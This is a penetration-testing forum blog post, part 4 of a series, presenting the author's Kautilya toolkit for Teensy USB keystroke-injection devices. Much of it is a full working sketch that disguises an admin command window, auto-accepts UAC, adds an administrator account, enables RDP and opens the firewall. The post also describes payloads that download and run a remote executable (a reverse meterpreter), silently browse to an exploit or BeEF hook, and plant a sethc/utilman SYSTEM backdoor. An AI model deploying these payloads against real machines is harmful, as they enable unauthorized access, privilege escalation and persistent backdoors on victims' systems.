• Teensy USB HID for Penetration Testers - Part 4 - Kautilya

    In third part of this series, we discussed how to write sketches using Arduino and Teensyduino. In this part, let's have a look at Kautilya. Kautilya is a toolkit written by me which helps in easing usage of Teensy in a penetration test. It is named after the famous Indian strategist, economist and political scientist Chankaya (Kautilya is one of his alias). I will touch some less complex payload of Kautilya in this post.

    Kautilya has a menu driven UI which could be used to generate sketches without a need of knowing how to program a Teensy device. The toolkit is written in Ruby and is free and open source. It currently contains payloads for Windows 7 and Linux (tested on Ubuntu 11). Kautilya is specifically designed to support Teensy out of the box, there is absolutely no modification required to the hardware.My motive behind writing Kautilya is to bring Teensy to masses. During my talks about Kautilya and Teensy I observed that often Pen Testers do not have enough time to program a device for their usage. Payloads in Kautilya could be used for pre exploitation and post exploitation tasks other than the “usual” popping of shells.

    The process of writing payloads for a Windows 7 machine could be summed up as:

    1. Understand the operating system in terms of USB buffer.
    2. Understand the commands supported and learn to write powershell or/and vbs.
    3. Recognize the built-in security measures (like UAC and powershell script execution policy) which may check privileged commands and then learn how to bypass them.
    4. Understand the time taken by operating system in completing various commands.
    5. Write the commands and scripts on Teensy.
    6. Understand more quirks of the command line when Teensy types out thing on victim.
    7. Try not to be too noisy on the victim.
    8. Test the payload and reach to final reasonable sketch.
    9. Compile the sketch to Teensy device.
    10. Attach it to the victim machine actively or using Social Engineering.
    11. Enjoy the pwnage!


    (Next few lines may look like self promotion )

    Kautilya automates steps 1-8 for you. Using Kautilya you just need to:

    1. Select a payload and select your options. A sketch (a .ino or .pde file) would be generated for you.
    2. Compile the sketch to Teensy device.
    3. Attach it to the victim machine actively or using Social Engineering.
    4. Enjoy the pwnage!





    Kautilya is tested on Ruby 1.9.2. It requires ruby gems "colored" and "highline".

    Let's have a look at some of the payloads for Windows in Kautilya. All the payloads are tested on a default install of Windows 7.

    Add a user and Enable RDP
    This payload adds an admin user to the victim. It also, enables and starts Terminal Service on the victim. An exception to Windows firewall is also added. This payload requires a user to be logged in with admin privileges.



    The generated payload just needs to be compiled to a Teensy++. The device could then be connected to the victim. The victim will see start menu open up, some cmd being type and then a very small cmd window which type dark blue on black will do evil stuff for us...muhahaha


    Let's have a look at the source code for better understanding. Many payloads in Kautilya are similar in structure to this one.

    Code:
    // Add an admin user and enable RDP payload of Kautilya
    # define PAYLOAD_USER_ADD "net user INPUT0 INPUT1 /add"
    //INPUT0 would be the username and INPUT1 would be the password.
    # define PAYLOAD_GROUP_ADD "net localgroup Administrators INPUT0 /add"
    
    void setup(){
     delay(5000);
     cmd_admin();
    \\call to cmd_admin function
     delay(5000);
     send_alt_y();
    \\\\call to send_alt_y function
     delay(5000);
    
    add_user();
    \\call to add_user function
    
    Keyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f");
    \\Enable terminal service
    delay(2000);
    Keyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Services\\TermService\" /v Start /t REG_DWORD /d 2 /f");
    delay(2000);
    Keyboard.println("sc start termservice");
    \\start terminal service
    delay(2000);
    Keyboard.println("netsh firewall set service type = remotedesktop mode = enable");
    \\Add execption to Windows Firewall
    delay(3000);
    Keyboard.println("exit");
    }
    
    void loop(){
    }
    
    void run(char *SomeCommand){
      Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
      Keyboard.set_key1(KEY_R);
      Keyboard.send_now();
    
      delay(1500);
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
    
      Keyboard.print(SomeCommand);
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();
    
      Keyboard.set_key1(0);
      Keyboard.send_now();
    }
    void add_user(){
    delay(2000);
    Keyboard.println(PAYLOAD_USER_ADD);
    delay(2000);
    Keyboard.println(PAYLOAD_GROUP_ADD);
    delay(1000);
    
    }
    
    
    void send_alt_y(){
    \\This function sends an Alt + Y to UAC prompt
    \\thus effectively saying yes to the prompt  
      delay(1000);
      Keyboard.set_modifier(MODIFIERKEY_ALT);
      Keyboard.set_key1(KEY_Y);
      Keyboard.send_now();
      delay(100);
    
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      }
    void cmd_admin(){
      Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
      Keyboard.send_now();
      delay(1000);
      Keyboard.set_modifier(0);
      Keyboard.send_now();
      delay(2000);
      Keyboard.print("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\" ");
      \\this opens up a small cmd window which writes dark blue on black and have title Installing drivers
      delay(2000);
      Keyboard.set_modifier(MODIFIERKEY_CTRL);
      Keyboard.send_now();
      Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
      Keyboard.send_now();
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();
    
      delay(200);
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
    }
    Download and Execute
    This payload downloads an executable stored in text format from pastebin (or any other service which allows hosting of text without formatting), converts it back to exe on the victim and executes it in background. The exe must be converted into hex format using script exetotext.ps1 in extras folder of Kautilya. This script is originally an idea of Matt of Exploit-Monday blog.



    In the above example, a windows reverse meterpreter is pasted to pastebin and the url is provided in the option.This payload could be used even with a low privilege user.

    Forceful Browsing

    This payload opens up a hidden instance of Internet Explorer using a COM obbject of Internet Explorer and browses to the provided URL. An ideal use case could be hosting an exploit of msf or a hook of BeEF on the given URL. This payload is one of my favorites as it is able to get executed on a normal user (non administrative) privilege and is very silent.

    Sethc and Utilman Backdoor

    This payload utilizes a useful hack in the Windows OS family. On a locked system, if you press Shift key five times (or Left Ctrl + Left Shift + Prnt Scr) i.e. sticky keys, sethc.exe is executed with SYSTEM level privileges. In a similar way, if Window key +U is pressed, utilmanager (which is utilman.exe ) is launched with SYSTEM privs. This payload attaches a an executable present on the machine as a debugger to sethc.exe and utilman.exe. The attahced executables can then be executed with SYSTEM level privileges on a locked Windows machine.



    We had a look at some less complex payloads of Kautilya. In the next post (or posts) I will explain some more complex and powerful payloads. At least one post will cover breaking Linux (Ubuntu11) too.

    I am thinking of creating some small videos demonstrating few payloads but only if some people ask for it Please let me know if the length of blog posts is ok. Feedback and comments are welcome.
    Part I-http://www.garage4hackers.com/conten...o-install.html
    Read Part II- http://www.garage4hackers.com/conten...llo-world.html
    Part III- http://www.garage4hackers.com/conten...s-arduino.html
    This article was originally published in blog: Teensy USB HID for Penetration Testers - Part 4 - Kautilya started by SamratAshok
    Comments 1 Comment
    1. H@CK3R_ADI's Avatar
      H@CK3R_ADI -
      kudos to u for such a nice articles...it will be helpful for me mate
  • G4H Facebook

  • G4H Twitter